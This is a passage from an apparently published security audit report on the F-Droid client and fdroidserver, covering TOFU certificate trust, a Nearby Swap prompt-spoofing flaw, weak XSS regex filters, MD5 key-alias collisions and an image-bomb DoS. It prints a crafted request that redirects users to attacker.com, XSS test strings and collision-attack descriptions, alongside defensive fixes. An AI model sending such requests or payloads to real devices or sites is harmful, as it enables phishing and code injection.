<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Reflected XSS leading to client-side information disclosure.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The user-supplied URI should be parsed and its components validated before it is included in the response.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Alternatively, URL-encode or HTML-encode the URI before inserting it.</div></div>
</div>
<a name="f39-trustonfirstuse-tofu-usage"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.9</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-009 — Application Uses TrustOnFirstUse (TOFU) With an Unverified Signing Certificate</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-009</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Unverified trust</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application uses Trust On First Use (TOFU), potentially trusting an unverified signing certificate.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The verifySigningCertificate() function allows a new, non-verified (and non-verifiable) certificate into the DB. This code applies TOFU (trust on first use).</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Trust On First Use is useful to establish initial contact where an a-priori shared key is not available, or cannot be available. This works acceptably if the user is prompted to decide whether the presented key is to be trusted. For example, the first SSH connection from a client to a server prompts the user whether the certificate presented by the server is trusted.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In the case of the fdroid app, it appears that the TOFU key is trusted without a prompt to the user. The TOFU key appears to be persisted in the repo database, thus making the TOFU key permanently trusted.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In file IndexV1Updater.java:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">243:    X509Certificate certificate = getSigningCertFromJar(indexEntry);
        verifySigningCertificate(certificate);
417:
        if (repo.signingCertificate == null) {
            if (repo.fingerprint != null) {
                String fingerprintFromJar = Utils.calcFingerprint(rawCertFromJar);
                if (!repo.fingerprint.equalsIgnoreCase(fingerprintFromJar)) {
                    throw new SigningException(repo,
                            "Supplied certificate fingerprint does not match!");
                }
            }
            Utils.debugLog(TAG, "Saving new signing certificate to database for " + repo.address);
            ContentValues values = new ContentValues(2);
            values.put(Schema.RepoTable.Cols.LAST_UPDATED, Utils.formatDate(new Date(), ""));
            values.put(Schema.RepoTable.Cols.SIGNING_CERT, Hasher.hex(rawCertFromJar));
            RepoProvider.Helper.update(context, repo, values);
            repo.signingCertificate = certFromJar;
        }
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In file RepoUpdater.java, while processing the downloaded jar file (public method processDownloadedFile(), starting at line 201):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 237:    assertSigningCertFromXmlCorrect();
...
...
Line 280:    private void assertSigningCertFromXmlCorrect() throws SigningException {
        // no signing cert read from database, this is the first use
        if (repo.signingCertificate == null) {
            verifyAndStoreTOFUCerts(signingCertFromIndexXml, signingCertFromJar);
        }
...
...
Line 392:
    private void verifyAndStoreTOFUCerts(String certFromIndexXml, X509Certificate rawCertFromJar)
            throws SigningException {
...
...
        Utils.debugLog(TAG, "Saving new signing certificate in the database for " + repo.address);
        ContentValues values = new ContentValues(2);
        values.put(RepoTable.Cols.LAST_UPDATED, Utils.formatDate(new Date(), ""));
        values.put(RepoTable.Cols.SIGNING_CERT, Hasher.hex(rawCertFromJar));
        RepoProvider.Helper.update(context, repo, values);
    }
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Customer response: </span></div><div style="margin-bottom: 5pt; line-height: 6mm;">The TOFU process is a bit more convoluted than it should be, that's for sure. The TOFU prompt is the "Add Repos" prompt, where the fingerprint can either be included from clicking a URL that includes it, like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://guardianproject.info/fdroid/repo?fingerprint=B7C2EEFD8DAC7806AF67DFCD92EB18126BC08312A7F2D6F3862E46013C7A6135</span> or by manually typing it in.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">If there is no fingerprint provided, then yes, the first signing key seen by F-Droid will be the one that is trusted. We decided that if the user hasn't already provided it, then another prompt won't make that more likely.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Unverified signing certificate saved to DB makes it easier for future attacks to succeed, thus causing potential device compromise.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">For mobile-based repos, use a mechanism similar to asking for a PIN before pairing two devices over Bluetooth.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">For non-mobile-based repos, the TOFU key should not be stored permanently.</div></div>
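<div style="margin-bottom: 5pt; line-height: 6mm;">To make the three trust states in the excerpts explicit, the following is an added example (written for this report in Python, not the F-Droid client's Java code) of the decision verifySigningCertificate() takes, with the first-use path changed to require an explicit confirmation before anything is persisted. Assumptions: the fingerprint is the upper-case hex SHA-256 of the DER certificate (consistent with the 64-hex-digit value in the customer response), the stored certificate is compared by fingerprint, and the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">Repo</span> class and function names are stand-ins for the client's types.</div>

```python
"""Added example (not F-Droid client code): repo signing-certificate trust decision
with an explicit first-use confirmation step."""
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit


class SigningException(Exception):
    pass


class Repo:
    """Minimal stand-in for the client's repo record (constructed for this example)."""

    def __init__(self, address, fingerprint=None, signing_certificate=None):
        self.address = address
        # fingerprint the user supplied when adding the repo (URL or typed), or None
        self.fingerprint = fingerprint
        # DER certificate bytes stored in the database after first use, or None
        self.signing_certificate = signing_certificate


def calc_fingerprint(cert_der: bytes) -> str:
    """Assumption: upper-case hex SHA-256 of the DER certificate."""
    return hashlib.sha256(cert_der).hexdigest().upper()


def fingerprint_from_repo_url(url: str):
    """Extract ?fingerprint=... from an 'Add Repo' URL, or None when absent."""
    values = parse_qs(urlsplit(url).query).get("fingerprint")
    return values[0].strip().upper() if values else None


def verify_signing_certificate(repo: Repo, cert_from_jar: bytes, confirm_first_use) -> str:
    """Decide whether `cert_from_jar` may sign `repo`'s index.

    Returns "pinned", "verified" or "tofu". confirm_first_use(address, fingerprint)
    is the prompt the recommendation asks for; the certificate is persisted only
    after it returns True, instead of being saved silently as in the excerpt.
    """
    seen = calc_fingerprint(cert_from_jar)
    if repo.signing_certificate is not None:
        # Every later update: the certificate must match the one already stored.
        if not hmac.compare_digest(calc_fingerprint(repo.signing_certificate), seen):
            raise SigningException("signing certificate changed for " + repo.address)
        return "pinned"
    if repo.fingerprint is not None:
        # First use with a fingerprint from the URL or typed in by the user.
        if not hmac.compare_digest(repo.fingerprint.upper(), seen):
            raise SigningException("Supplied certificate fingerprint does not match!")
        repo.signing_certificate = cert_from_jar
        return "verified"
    # No fingerprint at all: the TOFU path. Require an explicit decision before
    # anything is written to the database.
    if not confirm_first_use(repo.address, seen):
        raise SigningException("first-use certificate rejected for " + repo.address)
    repo.signing_certificate = cert_from_jar
    return "tofu"


def is_accepted(repo: Repo, cert_from_jar: bytes, confirm_first_use) -> bool:
    """Boolean wrapper for callers that only need to know whether the index is trusted."""
    try:
        verify_signing_certificate(repo, cert_from_jar, confirm_first_use)
        return True
    except SigningException:
        return False
```

<div style="margin-bottom: 5pt; line-height: 6mm;">The "tofu" return value is what lets a caller implement the second recommendation: a repo added through swap can keep the certificate for the session only, while a repo added with a fingerprint ("verified") is safe to persist.</div>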
</div>
<a name="f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.10</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-010 — (fdroid Client) Exploiting "Nearby Swap" Feature to Show Malicious Prompt to Users or Redirect to Malicious Sites</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-010</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Malicious Use of Feature</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The request to http://[client IP]:8888/request-swap is vulnerable because any user can send it to the client's device. This can be used to show malicious messages and also to redirect users.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">While a user is using the Nearby Swap feature of the application, it is possible to send a request to http://[client IP]:8888/request-swap with any message. This message is shown to the user as if it were sent by the fdroid application.</div>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/Screenshot.png %}" height="567"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Exploiting the request to redirect users</span></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">If the request below is sent to the user's device and the user answers the prompt with "Yes", they are redirected to the provided domain.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">POST /request-swap HTTP/1.1
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Host: 192.168.57.33:8888
Connection: close
User-Agent: F-Droid
repo=http://attacker.com%2Ffdroid%2Frepo%3Fabc.apk</div></pre>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/attacker_domain.png %}" height="567"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The user is redirected to attacker.com if they select "Yes" at the prompt.</div>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/Capture.PNG %}" width="340.2"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">This vulnerability may allow an attacker to show any message on the user's device, looking like a message from fdroid. With a bit more user interaction, the attacker can even redirect the mobile application user to a website of their own.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">The application should validate both the message shown to the user and its origin. Accepting an arbitrary message or domain from another user and redirecting the user to that domain is a very insecure implementation: users should not be redirected to any domain supplied by the other party, and this parameter also needs to be validated.</div>
</div>
</div>
<a name="f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.11</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-011 — Weak Regexps Filtering XSS and Unwanted HTML Tags in Fdroidserver/lint.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-011</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Sanity checks in fdroidserver lint are easily evaded and allow injection of javascript code in descriptions of apps.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The regular expressions used to blacklist certain HTML tags and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> URLs are easily evaded:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">(re.compile(r'.*<(iframe|link|script).*'),
...
(re.compile(r'''.*\s+src=["']javascript:.*'''),</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Code Injection in websites displaying descriptions of apps.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Sanitize the descriptions with an allowlist-based HTML sanitizer such as bleach instead of blacklisting patterns.</div>
</div>
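<div style="margin-bottom: 5pt; line-height: 6mm;">As an added illustration (not part of this report or of fdroidserver), the following Python contrasts the two blacklist patterns quoted above with an allowlist sanitizer built on the standard library's <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">html.parser</span>, which is the approach bleach takes: every tag and attribute not explicitly allowed is removed, script and style bodies are dropped, and text is re-escaped on output, so safety does not depend on guessing the spelling of a dangerous construct. The tag/attribute policy, the function names and the sample descriptions are assumptions made for the example; whether lint applies the patterns with re.match is also assumed.</div>

```python
import re
from html import escape
from html.parser import HTMLParser

# The two blacklist patterns quoted from fdroidserver/lint.py, kept only for
# comparison. Assumption: lint applies them with re.match().
BLACKLIST = [
    re.compile(r'.*<(iframe|link|script).*'),
    re.compile(r'''.*\s+src=["']javascript:.*'''),
]


def blacklist_flags(text):
    """True if either lint pattern matches the description."""
    return any(rx.match(text) for rx in BLACKLIST)


# Allowlist policy for the sanitizer (assumed policy, not F-Droid's).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li", "a"}
VOID_TAGS = {"br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:")
DROP_CONTENT_TAGS = {"script", "style"}  # element *and* its text are removed


class AllowlistSanitizer(HTMLParser):
    """Rebuild a description from parsed tokens, emitting only allowlisted
    tags and attributes. Unknown tags vanish but their text is kept; script
    and style bodies are dropped; all text is HTML-escaped on the way out."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skipping = None  # name of the script/style element being dropped

    def handle_starttag(self, tag, attrs):
        if self.skipping:
            return
        if tag in DROP_CONTENT_TAGS:
            self.skipping = tag
            return
        if tag not in ALLOWED_TAGS:
            return  # tag removed; its inner text still arrives via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue
            value = value.strip()
            # Only allowlisted URL schemes survive; javascript:, data:, etc. are dropped.
            if name == "href" and not value.lower().startswith(SAFE_URL_PREFIXES):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif not self.skipping and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))


def sanitize_description(text):
    """Return the allowlist-sanitized form of an app description."""
    parser = AllowlistSanitizer()
    parser.feed(text)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample descriptions.
    for sample in ('Hello <b>world</b>',
                   'x <script>alert(1)</script> y',
                   '<a href="javascript:alert(1)">click</a>',
                   '<a href="https://f-droid.org/">F-Droid</a>'):
        print(repr(sample), "-> flagged:", blacklist_flags(sample),
              "sanitized:", repr(sanitize_description(sample)))
```

<div style="margin-bottom: 5pt; line-height: 6mm;">The difference in approach is what the recommendation is about: the regexes answer "does this text contain a pattern we thought of?", whereas the sanitizer parses the markup and rebuilds it from a fixed vocabulary, so the output is safe by construction regardless of how the input was written.</div>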
</div>
<a name="f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.12</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-012 — Key Alias Collisions Can Lead to DoS of Publishing in Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-012</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">By submitting an app to fdroid with a crafted appid, it is possible to block the publishing of new apps to fdroid.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The function key_alias() derives the key alias from the appid by hashing it with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">MD5</span> and taking the first 8 hex digits of the digest: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">m.hexdigest()[:8]</span>. This is only 32 bits, and due to the birthday paradox collisions are reasonably cheap to find.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The main() function checks for key alias collisions and, if there is one, the publish script aborts. A comment referring to a previous audit states that the chance of encountering a collision is negligible.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">We produced two PoC scripts; both take as input an English wordlist (taken from the Debian /usr/share/dict/words) with all lines ending in "'s" removed, resulting in a list of 73333 English words.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In PoC-1 (collidemd5-4.py) we generate appids from random English words as long as there is no collision. After approximately 9000 samples we find that it takes about 113,930 random appids until there is a collision.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In PoC-2 we adjust our sampling to take into account that there are currently about 1500 apps in fdroid, and we try to create a collision with one of these 1500 items. After 1355 samples it takes on average 2,925,625 attempts to collide with one of the 1500 target hashes.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">This shows it is feasible to create a collision and create a DoS against the publishing process.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Note also that the key_alias() function allows the key alias to be overridden, but the check in the main() function does not take such overrides into account.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">publish.py:186 (main()):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"># It was suggested at
# https://dev.guardianproject.info/projects/bazaar/wiki/FDroid_Audit
# that a package could be crafted, such that it would use the same signing
# key as an existing app. While it may be theoretically possible for such a
# colliding package ID to be generated, it seems virtually impossible that
# the colliding ID would be something that would be a) a valid package ID,
# and b) a sane-looking ID that would make its way into the repo.
# Nonetheless, to be sure, before publishing we check that there are no
# collisions, and refuse to do any publishing if that's the case...
allapps = metadata.read_metadata()
vercodes = common.read_pkg_args(options.appid, True)
allaliases = []
for appid in allapps:
    m = hashlib.md5()
    m.update(appid.encode('utf-8'))
    keyalias = m.hexdigest()[:8]
    if keyalias in allaliases:
        logging.error(_("There is a keyalias collision - publishing halted"))
        sys.exit(1)
    allaliases.append(keyalias)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Denial of Service</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Either use longer aliases, or do not derive the aliases from user-controlled input.</div></div>
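<div style="margin-bottom: 5pt; line-height: 6mm;">As an added worked example (not code from this report or from fdroidserver), the following Python reproduces the 8-hex-digit alias derivation described above, puts the birthday-paradox argument into numbers that can be compared with the measured figures, and shows a collision check that uses the effective alias, overrides included, which is the gap noted in main(). The <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">keyaliases</span> override map is a simplified assumption standing in for whatever override mechanism key_alias() actually supports; the function names are the example's own.</div>

```python
import hashlib
import math


def key_alias(appid, keyaliases=None):
    """Alias derivation as described in the finding: MD5 over the UTF-8 appid,
    first 8 hex digits (32 bits). `keyaliases` (assumed shape: appid -> alias)
    stands in for the override that key_alias() supports."""
    if keyaliases and appid in keyaliases:
        return keyaliases[appid]
    return hashlib.md5(appid.encode("utf-8")).hexdigest()[:8]


def find_alias_collisions(appids, keyaliases=None):
    """Return {alias: [appid, ...]} for every alias shared by more than one app.
    Unlike the check quoted from publish.py main(), this compares the *effective*
    alias, so an override that lands on another app's derived alias is caught."""
    by_alias = {}
    for appid in appids:
        by_alias.setdefault(key_alias(appid, keyaliases), []).append(appid)
    return {alias: ids for alias, ids in by_alias.items() if len(ids) > 1}


def expected_samples_until_collision(bits):
    """Birthday bound: expected number of random aliases drawn before two of
    them coincide in a space of 2**bits values, sqrt(pi * N / 2)."""
    return math.sqrt(math.pi * 2 ** bits / 2)


def expected_attempts_to_hit_targets(bits, targets):
    """Expected random draws before matching any one of `targets` fixed
    aliases (the second PoC's scenario): N / targets."""
    return 2 ** bits / targets


if __name__ == "__main__":
    # 32 bits (8 hex digits) versus 64 bits (16 hex digits), the "longer ids" option.
    for bits in (32, 64):
        print("%d-bit alias: ~%.3g samples to a collision, ~%.3g attempts to hit one of 1500"
              % (bits, expected_samples_until_collision(bits),
                 expected_attempts_to_hit_targets(bits, 1500)))
    # Constructed override that collides with another app's derived alias.
    apps = ["com.example.one", "com.example.two"]
    clash = {"com.example.two": key_alias("com.example.one")}
    print("collisions without override:", find_alias_collisions(apps))
    print("collisions with override:   ", find_alias_collisions(apps, clash))
```

<div style="margin-bottom: 5pt; line-height: 6mm;">For 32 bits the expected cost of a random collision is about 82,000 draws and of hitting one of 1500 existing aliases about 2.86 million, the same order as the 113,930 and 2,925,625 measured above; with 16 hex digits the first figure rises to roughly 5.4 billion, and with the full 128-bit digest the search is out of reach, which is the quantitative content of the "longer ids" recommendation.</div>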
</div>
<a name="f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.13</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-013 — Image Bomb Can Lead to DoS in Fdroidserver:update.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-013</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Maliciously crafted images can lead to resource exhaustion in fdroidserver.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">A crafted image processed by <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_strip_and_copy_image()</span> can exhaust the RAM and hard disk of the fdroidserver host (<span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">resize_icon()</span> may also be affected).</div>
